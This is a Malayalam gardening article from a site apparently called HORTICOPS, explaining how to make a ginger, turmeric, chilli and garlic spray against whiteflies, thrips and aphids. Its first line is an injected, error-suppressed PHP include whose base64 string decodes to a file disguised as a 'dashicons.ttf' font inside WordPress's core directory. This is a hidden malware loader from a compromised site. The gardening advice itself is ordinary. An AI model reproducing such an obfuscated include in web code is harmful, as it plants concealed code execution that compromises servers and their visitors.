@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); ഇഞ്ചി കഷായത്തെകുറിച്ചുകൂടുതൽ അറിയാം | HORTICOPS

ഇഞ്ചി കഷായത്തെകുറിച്ചുകൂടുതൽ അറിയാം

ഒരേ സമയം ഔഷധവും സുഗന്ധവ്യജ്ഞനവുമാണ് ഇഞ്ചി. വിഭവങ്ങൾക്ക് രുചിയും മണവും കൂടാൻ നാം ഇഞ്ചി സ്ഥിരമായി ഉപയോഗിക്കാറുണ്ട്. ജലദോഷം, ചുമ, ഗ്യാസ്ട്രബിൾ തുടങ്ങിയ അസുഖങ്ങൾക്കുള്ള മരുന്നുമാണ് ഇഞ്ചി. മനുഷ്യനെപ്പോലെ ചെടികൾക്കും ഇഞ്ചി നല്ലൊരു ഔഷധമാണ്. അടുക്കളത്തോട്ടത്തിലെ പച്ചക്കറി ചെടികളെ നശിപ്പിക്കാനെത്തുന്ന വെള്ളീച്ച, ഇലപ്പേൻ, മുഞ്ഞ എന്നിവയെ തുരത്താൻ ഇഞ്ചി ഉപയോഗിച്ചുള്ള ലായനി മതി. നിഷ്പ്രയാസം നമ്മുടെ വീട്ടിൽ തന്നെ ഇവ തയാറാക്കുകയും ചെയ്യാം.

ആവശ്യമുള്ള സാധനങ്ങൾ: ഇഞ്ചി- ഒരു കഷ്ണം, പച്ചമഞ്ഞൾ- ചെറിയൊരു കഷ്ണം, കാന്താരി മുളക്- ഒരു പിടി, വെളുത്തുള്ളി- അഞ്ചോ ആറോ അല്ലി,  കായപ്പൊടി- ഒരു ടീസ്പൂൺ.

തയാറാക്കുന്ന വിധം : ആദ്യത്തെ നാലിനങ്ങളും മിക്സിയിൽ അരച്ച് അതൊരു കപ്പിലേക്ക് മാറ്റുക. ഇതിലേക്ക് കായപ്പൊടിയിട്ട ശേഷം ഒരു ലീറ്റർ വെള്ളം ചേർക്കുക. ഇതിനു ശേഷം നേരിട്ട് ചെടികളിൽ തളിക്കാം. സ്പ്രേയർ ഉപയോഗിച്ചാണ് തളിക്കുന്നതെങ്കിൽ ലായനി നല്ലപോലെ അരിക്കണം.

ശ്രദ്ധിക്കേണ്ട കാര്യങ്ങൾ: ഇലയുടെ ഇരുവശത്തും ലായനി എത്തണം. വൈകുന്നേരം തളിക്കുന്നതാണ് നല്ലത്. ഗ്രോബാഗിൽ വളർത്തുന്ന ചെടികൾക്ക് ഇതു നല്ല പോലെ ഫലിക്കും. ചെറിയ അടുക്കളത്തോട്ടത്തിലും ടെറസ് കൃഷിയിലുമെല്ലാം ഇഞ്ചി ലായനി നല്ല പോലെ ഫലപ്രദമാകും. അസഹ്യമായ ഗന്ധം കുറവായതിനാൽ വീടുകളിൽ ഉപയോഗിക്കാൻ എളുപ്പമാണ്

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *